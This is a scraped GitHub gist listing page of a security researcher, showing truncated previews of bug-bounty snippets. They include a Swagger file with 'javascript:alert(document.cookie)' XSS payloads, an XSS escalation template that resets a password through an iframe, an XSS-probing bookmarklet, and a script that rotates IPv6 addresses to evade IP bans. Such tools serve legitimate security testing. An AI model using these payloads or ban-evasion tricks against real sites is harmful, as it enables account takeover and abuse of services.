Skip to content

Instantly share code, notes, and snippets.

Justin Gardner Rhynorater

Block or report user

Report or block Rhynorater

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
Rhynorater /
Created Sep 9, 2019
Quickly rotating IPs to avoid ip ban using /64 ipv6 block.
import requests
from httplib import HTTPConnection
import socket
import subprocess
class MyHTTPConnection(HTTPConnection):
def connect(self):
self.sock = s
if self._tunnel_host:
Rhynorater /
Created Jul 1, 2019
Bash script to check if a certain domain is user O365
# Usage
# domains.txt: file with domains on each line to check
# Output: domains that use O365
# -----
# Usage2
# Output: domain if uses 0365, nothing if not
if [ "$#" -eq 1 ]; then
x=$(curl -s -k "$1&xml=1" | egrep "Federated|Managed")
if [[ ! -z $x ]]; then
View gist:3edacd885c61c55dea5b167cba07322d
"swagger": "2.0",
"info": {
"title": "Swagger Sample App",
"description": "Please to click Terms of service",
"termsOfService": "javascript:alert(document.cookie)"
"name": "API Support",
"url": "javascript:alert(document.cookie)",
Rhynorater / exploit.php
Created Jan 17, 2019
Basic XSS Escalation Template
View exploit.php
header("Content-Type: application/javascript");
frame.addEventListener("load", function() {
//Once the iframe loads, give it 1 second to load the DOM
//Set new password
Rhynorater /
Created Sep 9, 2018
A little bash script to gather valid AND fast DNS Resolvers from
if [ "$#" -eq 0 ] || [ "$#" -gt 2 ] || [[ $* == *--help* ]] || [[ $* == *-h* ]]; then
echo "Usage ./ [output file] [optional: timeout (seconds)]"
exit 1
Rhynorater / gist:311cf3981fda8303d65c27316e69209f
Last active Jan 8, 2019
BXSS - CSP Bypass with Inline and Eval
View gist:311cf3981fda8303d65c27316e69209f
Rhynorater / bookmarklet.js
Created Mar 27, 2018
OSCP Video Playback Speed Increase
View bookmarklet.js
javascript:document.getElementById("video").defaultPlaybackRate = prompt("Enter your prefered playback rate:");document.getElementById("video").load();
View gist:2a7d84fe202d65d71ef557bb3481a520
### Keybase proof
I hereby claim:
* I am rhynorater on github.
* I am rhynorater ( on keybase.
* I have a public key whose fingerprint is AA8E 85A7 69EC F8A7 0FE8 5CF2 AF19 CF4E BEEC A770
To claim this, I am signing this object:
Rhynorater / XSSbookmarklet.js
Last active Sep 10, 2019
XSS Discovery Bookmarklet
View XSSbookmarklet.js
javascript:(function()%7Bvar j %3D document.getElementsByTagName("input")%3Bif (document.location.href.indexOf("%3F")>-1)%7Bvar l %3D "%26"%3B%7Delse%7Bvar l %3D "%3F"%3B%7Dfor (i%3D0%3Bi<j.length%3Bi%2B%2B)%7Bl%2B%3Dj%5Bi%5D.getAttribute("name")%2B'%3D"><test1234>%26'%7Ddocument.location %3D document.location%2Bl%7D)()
You can’t perform that action at this time.